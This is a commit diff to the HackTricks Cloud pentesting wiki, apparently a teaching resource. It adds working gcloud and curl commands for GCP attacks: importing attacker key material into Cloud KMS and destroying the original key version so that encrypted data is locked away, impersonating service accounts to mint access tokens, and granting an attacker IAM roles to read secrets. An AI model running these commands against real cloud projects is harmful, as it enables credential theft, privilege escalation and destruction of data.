GITBOOK-613: No subject

pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md

@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -90,6 +90,82 @@ gcloud kms import-jobs create [IMPORT_JOB] --location [LOCATION] --keyring [KEY_
 * **Delete the KMS key**
 * Now only the attacker, who has the original key material could be able to decrypt the encrypted data
 
+#### Here are the steps to import a new version and disable/delete the older data:
+
+```bash
+# Encrypt something with the original key
+echo "This is a sample text to encrypt" > /tmp/my-plaintext-file.txt
+gcloud kms encrypt \
+ --location us-central1 \
+ --keyring kms-lab-2-keyring \
+ --key kms-lab-2-key \
+ --plaintext-file my-plaintext-file.txt \
+ --ciphertext-file my-encrypted-file.enc
+
+# Decrypt it
+gcloud kms decrypt \
+ --location us-central1 \
+ --keyring kms-lab-2-keyring \
+ --key kms-lab-2-key \
+ --ciphertext-file my-encrypted-file.enc \
+ --plaintext-file -
+
+
+# Create an Import Job
+gcloud kms import-jobs create my-import-job \
+ --location us-central1 \
+ --keyring kms-lab-2-keyring \
+ --import-method "rsa-oaep-3072-sha1-aes-256" \
+ --protection-level "software"
+
+# Generate key material
+openssl rand -out my-key-material.bin 32
+
+# Import the Key Material (it's encrypted with an asymetrict key of the import job previous to be sent)
+gcloud kms keys versions import \
+ --import-job my-import-job \
+ --location us-central1 \
+ --keyring kms-lab-2-keyring \
+ --key kms-lab-2-key \
+ --algorithm "google-symmetric-encryption" \ 
+ --target-key-file my-key-material.bin
+
+# Get versions
+gcloud kms keys versions list \
+ --location us-central1 \
+ --keyring kms-lab-2-keyring \
+ --key kms-lab-2-key
+
+# Make new version primary
+gcloud kms keys update \
+ --location us-central1 \
+ --keyring kms-lab-2-keyring \
+ --key kms-lab-2-key \
+ --primary-version 2
+
+# Try to decrypt again (error)
+gcloud kms decrypt \
+ --location us-central1 \
+ --keyring kms-lab-2-keyring \
+ --key kms-lab-2-key \
+ --ciphertext-file my-encrypted-file.enc \
+ --plaintext-file -
+
+# Disable initial version
+gcloud kms keys versions disable \
+ --location us-central1 \
+ --keyring kms-lab-2-keyring \
+ --key kms-lab-2-key 1
+
+# Destroy the old version
+gcloud kms keys versions destroy \
+ --location us-central1 \
+ --keyring kms-lab-2-keyring \
+ --key kms-lab-2-key \
+ --version 1
+
+```
+
 ### `cloudkms.cryptoKeyVersions.useToEncrypt` | `cloudkms.cryptoKeyVersions.useToEncryptViaDelegation`
 
 ```python
@@ -201,7 +277,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>

pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md

@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -36,6 +36,11 @@ You can find a script to automate the **creation, exploit and cleaning of a vuln
 
 An attacker with the mentioned permissions will be able to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours.
 
+```bash
+gcloud --impersonate-service-account="${victim}@${PROJECT_ID}.iam.gserviceaccount.com" \
+ auth print-access-token
+```
+
 You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
 
 ### `iam.serviceAccountKeys.create`
@@ -58,9 +63,22 @@ If you have the **`iam.serviceAccounts.implicitDelegation`** permission on a Ser
 
 ![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-500x493.png)
 
+Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation of `gcloud` only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method. So here you have how to get a token using the API directly:
+
+```bash
+curl -X POST \
+ 'https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/'"${TARGET_SERVICE_ACCOUNT}"':generateAccessToken' \
+ -H 'Content-Type: application/json' \
+ -H 'Authorization: Bearer '"$(gcloud auth print-access-token)" \
+ -d '{
+ "delegates": ["projects/-/serviceAccounts/'"${DELEGATED_SERVICE_ACCOUNT}"'"],
+ "scope": ["https://www.googleapis.com/auth/cloud-platform"]
+ }'
+```
+
 You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
 
-Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method.
+
 
 ### `iam.serviceAccounts.signBlob`
 
@@ -82,6 +100,11 @@ An attacker with the mentioned permissions will be able to **add IAM policies to
 gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \
  --member="user:[email protected]" \
  --role="roles/iam.serviceAccountTokenCreator"
+
+# If you still have prblem grant yourself also this permission
+gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \ \
+ --member="user:[email protected]" \
+ --role="roles/iam.serviceAccountUser"
 ```
 
 You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.**
@@ -141,7 +164,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>

pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md

@@ -39,7 +39,13 @@ As this is also a post exploitation technique it can be found in:
 
 ### `secretmanager.secrets.setIamPolicy`
 
-This give you access to give you access to read the secrets from the secret manager.
+This give you access to give you access to read the secrets from the secret manager, like using:
+
+```bash
+gcloud secrets add-iam-policy-binding <scret-name> \
+ --member="serviceAccount:<sa-name>@$PROJECT_ID.iam.gserviceaccount.com" \
+ --role="roles/secretmanager.secretAccessor"
+```
 
 <details>